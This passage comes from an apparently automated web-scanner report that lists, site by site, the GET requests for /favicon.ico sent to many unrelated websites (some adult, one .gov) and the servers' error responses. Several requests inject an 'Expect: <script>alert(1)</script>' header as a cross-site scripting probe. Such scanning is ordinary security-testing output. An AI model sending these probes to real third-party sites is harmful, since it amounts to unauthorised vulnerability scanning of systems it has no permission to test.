<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

29.117. http://www.momspussies.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.momspussies.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.momspussies.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 03 May 2011 11:41:27 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

29.118. http://www.moneyfactory.gov/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moneyfactory.gov
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.moneyfactory.gov
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:39:43 GMT
Server: Apache/2.2.17 (Unix) FrontPage/5.0.2.2635
Last-Modified: Thu, 26 Jul 2007 15:14:04 GMT
ETag: "19b842-2b5-4362c13c0adc6"
Accept-Ranges: bytes
Content-Length: 693
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Page Not Found</TITLE>
<style type="text/css">
<!--
h1 {
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size: 24p
...[SNIP]...

29.119. http://www.myezdeal.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myezdeal.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myezdeal.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

29.120. http://www.myfreedegree.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myfreedegree.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myfreedegree.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 25
Server: Perlbal
Connection: close

<h1>404 - Not Found</h1>

29.121. http://www.myspacecursor.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myspacecursor.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myspacecursor.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:11:48 GMT
Server: Apache
Last-Modified: Sun, 25 Jul 2010 12:26:30 GMT
ETag: "33b94-253-48c3560adc980"
Accept-Ranges: bytes
Content-Length: 595
Content-Type: text/html

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
<tr><
...[SNIP]...

29.122. http://www.nascigs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nascigs.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nascigs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:20:13 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.123. http://www.newscanary.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newscanary.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.newscanary.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 502 Bad Gateway
Server: nginx/0.6.34
Date: Tue, 03 May 2011 11:42:04 GMT
Content-Type: text/html
Content-Length: 173
Connection: keep-alive

<html>
<head><title>502 Bad Gateway</title></head>
<body bgcolor="white">
<center><h1>502 Bad Gateway</h1></center>
<hr><center>nginx/0.6.34</center>
</body>
</html>

29.124. http://www.noah-health.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.noah-health.org
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.noah-health.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:40:30 GMT
Server: Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.7 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
Content-Type: text/html
Content-Length: 4244

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Translational//EN// http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>NOAH 404 - File Not Found</title>
<style>
a:link { font-family:verdana; f
...[SNIP]...

29.125. http://www.oldmanwish.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oldmanwish.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oldmanwish.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Tue, 03 May 2011 10:18:33 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.62</center>
</body>
</html>

29.126. http://www.outsideinfo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.outsideinfo.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.outsideinfo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

29.127. http://www.outsidethebeltway.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.outsidethebeltway.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.outsidethebeltway.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 403 Forbidden
Server: nginx/0.8.53
Date: Tue, 03 May 2011 11:07:04 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/0.8.53</center>
</body>
</html>

29.128. http://www.pakalertpress.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pakalertpress.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pakalertpress.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 406 Not Acceptable
Date: Tue, 03 May 2011 10:40:16 GMT
Server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 372

<html>
<head><title> 406 Not Acceptable
</title></head>
<body><h1> 406 Not Acceptable
</h1>
This request is not acceptable<hr />
Powered By <a href='http://www.litespeedtech.com'>LiteSpeed Web Serve
...[SNIP]...

29.129. http://www.pemonitorhosted.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pemonitorhosted.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pemonitorhosted.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:34:27 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.130. http://www.perfectgirlsclub.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.perfectgirlsclub.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.perfectgirlsclub.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:41:36 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 491

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico was not found on this server.
<HR>
<I>www.p
...[SNIP]...

29.131. http://www.pipedomain.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pipedomain.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pipedomain.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 /favicon.ico
Server: Apache-Coyote/1.1
ETag: W/"244-1196720060000"
Last-Modified: Mon, 03 Dec 2007 22:14:20 GMT
Content-Type: text/html
Content-Length: 244
Date: Tue, 03 May 2011 10:36:55 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Error - Page Not Found</title>
</head>
<body>
<strong>The page you reques
...[SNIP]...

29.132. http://www.presidentsusa.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.presidentsusa.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.presidentsusa.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:22:14 GMT
Content-Type: text/html
Connection: keep-alive
Server: Apache/Nginx/Varnish
Last-Modified: Wed, 11 Mar 2009 02:33:42 GMT
ETag: "b415e64c-2ab-464ceb22c5135"
Vary: Accept-Encoding
Content-Length: 683
Accept-Ranges: bytes
Age: 0

<HTML>
<HEAD>
<TITLE>Presidents</TITLE>
<META NAME="keywords" CONTENT="Redirect page for Presidents">
<META NAME="description" CONTENT="President of the United States">
</HEAD>
<BODY LINK="#000
...[SNIP]...

29.133. http://www.private-teen-movies.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.private-teen-movies.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.private-teen-movies.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Tue, 03 May 2011 10:15:37 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.20</center>
</body>
</html>

29.134. http://www.privatemomsvideos.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.privatemomsvideos.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.privatemomsvideos.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Server: nginx/0.7.62
Date: Tue, 03 May 2011 10:18:32 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/0.7.62</center>
</body>
</html>

29.135. http://www.procarcare.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.procarcare.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.procarcare.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 10:58:08 GMT
Cneonction: close
Content-Type: text/html
Content-Length: 108

<html><head><title>Object Not Found</title></head><body><h1>HTTP/1.1 404 Object Not Found</h1></body></html>

29.136. http://www.projectguitar.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.projectguitar.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.projectguitar.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not found
Server: Zeus/4.3
Date: Tue, 03 May 2011 11:04:53 GMT
Connection: close
Content-Type: text/html

<H5>Error 404</H5>

29.137. http://www.propertyqube.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.propertyqube.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.propertyqube.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 503 Server Error
Connection: close
Date: Tue, 03 May 2011 10:19:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html

<html>
<head><title> A server error occurred. </title></head>
<h1> Server Error </h1>
<hr>
Either the Macromedia application server(s) are unreachable or none of them has a mapping to process this
...[SNIP]...

29.138. http://www.psoklahoma.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.psoklahoma.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.psoklahoma.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
IISExport: This web site was exported using IIS Export v4.1
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:13:39 GMT

<html><head><title>Error</title></head><body>The system cannot find the path specified.
</body></html>

29.139. http://www.raftergrafting.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.raftergrafting.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.raftergrafting.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 /favicon.ico
Server: Apache-Coyote/1.1
ETag: W/"244-1196720060000"
Last-Modified: Mon, 03 Dec 2007 22:14:20 GMT
Content-Type: text/html
Content-Length: 244
Date: Tue, 03 May 2011 11:10:22 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Error - Page Not Found</title>
</head>
<body>
<strong>The page you reques
...[SNIP]...

29.140. http://www.reflector.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reflector.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.reflector.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 03 May 2011 10:23:20 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=60
Vary: Accept-Encoding
Content-Length: 169
Vary: Accept-Encoding

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.53</center>
</body>
</html>

29.141. http://www.registerstar.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.registerstar.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.registerstar.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: WWW
Content-Type: text/html
Date: Tue, 03 May 2011 10:20:43 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
Real-Hostname: registerstar.com
Content-Length: 680
Connection: Keep-Alive
X-Cache-Info: cached

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

29.142. http://www.rentawreck.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rentawreck.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rentawreck.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Tue, 03 May 2011 10:47:45 GMT
Server: Apache
Content-Length: 390
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
<P>The expectation given in the Expect request-header fi
...[SNIP]...

29.143. http://www.restaurantrow.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.restaurantrow.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.restaurantrow.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

29.144. http://www.rogerssportinggoods.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rogerssportinggoods.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rogerssportinggoods.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:26:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 1240

<img src="http://www.rogerssportinggoods.com/image/data/rogers-logo-web.gif" alt="Rogers Sporting Goods" />
<h2>Oops!  I can see that you were looking for this page: /favicon.ico</h2>
<p><strong>
...[SNIP]...

29.145. http://www.rosscountyfair.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rosscountyfair.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rosscountyfair.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:34:36 GMT
Server: Apache/1.3.41 (Darwin) mod_ssl/2.8.31 OpenSSL/0.9.7l PHP/4.4.9 mod_perl/1.29
Last-Modified: Wed, 06 Jul 2005 19:37:51 GMT
ETag: "3ae7-1f1-42cc330f;4c4e3e53"
Accept-Ranges: bytes
Content-Length: 497
Connection: close
Content-Type: text/html

<html>
<head><title>Error</title></head>
<body>

<center>
<br><br><br>
<font size="+3">The page you are looking for does not<br>
exist on this server.</font>

<br><br><br><br>
...[SNIP]...

29.146. http://www.runningwarehouse.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.runningwarehouse.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.runningwarehouse.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:53 GMT
Server: 4D_WebSTAR_S/5.4.0 (MacOS X)
Connection: Close
Accept-Ranges: bytes
Last-Modified: Tue, 21 Feb 2006 00:05:45 GMT
Content-Length: 3638
Content-Type: text/html

..............h...&... ..............(....... ...........@...........................~~......>=@...!.........[Z].....nmp.............,+/.MLO.....dcf.........437...........
.wvy.....FEH.............$#
...[SNIP]...

29.147. http://www.rv-clubs.us/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rv-clubs.us
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rv-clubs.us
Accept: */*
Proxy-Connection: Keep-Alive

Response

29.148. http://www.satellitesales.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.satellitesales.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.satellitesales.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:37:09 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.149. http://www.secretmomsvideos.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.secretmomsvideos.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.secretmomsvideos.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Server: nginx/0.7.62
Date: Tue, 03 May 2011 11:41:51 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/0.7.62</center>
</body>
</html>

29.150. http://www.sekindo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sekindo.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sekindo.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Tue, 03 May 2011 10:29:28 GMT
Server: lighttpd/1.4.26

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

29.151. http://www.servpro.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.servpro.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.servpro.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:37:47 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.152. http://www.sheezyart.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sheezyart.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sheezyart.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
X-Powered-By: PHP/5.3.2
Content-type: text/html
Connection: close
Date: Tue, 03 May 2011 10:21:49 GMT
Server: lighttpd/1.4.26
Content-Length: 856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>You
...[SNIP]...

29.153. http://www.sister-seduction.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sister-seduction.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sister-seduction.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.46
Date: Tue, 03 May 2011 11:31:56 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.46</center>
</body>
</html>

29.154. http://www.slipstick.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.slipstick.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.slipstick.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:23:22 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.155. http://www.squirt-disgrace.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.squirt-disgrace.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.squirt-disgrace.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

29.156. http://www.srv17.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.srv17.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.srv17.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 03 May 2011 10:24:03 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 9

not found

29.157. http://www.sugarslam.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sugarslam.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
